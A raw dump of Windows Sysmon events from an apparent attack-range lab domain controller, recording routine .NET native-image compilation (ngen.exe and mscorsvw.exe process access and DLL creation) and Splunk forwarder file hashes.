21:04:22.618{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.540{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475290C51326D3F5B504468A6AABEB4F,SHA256=F653B1F64CB92E96FB53A0FC4B4AF691599EC2DE4C02008FCE54CF60CA00C701,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.415{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.368{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.368{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D6-60D3-B003-00000000CF01}3016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:22.275{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14f4-0\Microsoft.PowerShell.Workflow.ServiceCore.dll2021-06-23 21:04:22.275 23542300x800000000000000020695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.181{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3624D922FBD17E53E588BE1A02E01CE3,SHA256=7E3F2BD287210A1C1FD6CB5825FFBD6848B4D821B3A3D170677F9C698169875F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.978{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.946{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.915{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.915{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B803-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.900{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b0-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll2021-06-23 21:04:23.900 10341000x800000000000000020726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.868{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.853{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.853{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B703-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.790{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.790{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B603-00000000CF01}4844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:23.775{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b78-0\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll2021-06-23 21:04:23.775 23542300x800000000000000020719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.618{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BFE71A8E045F96AAC47CFA88F5FB63,SHA256=692672E8DECDF131581878671F4C51282AD961F9372B81F7B17EC0223D391850,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.571{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.556{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.462{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B403-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.446{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B403-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.446{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B403-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\W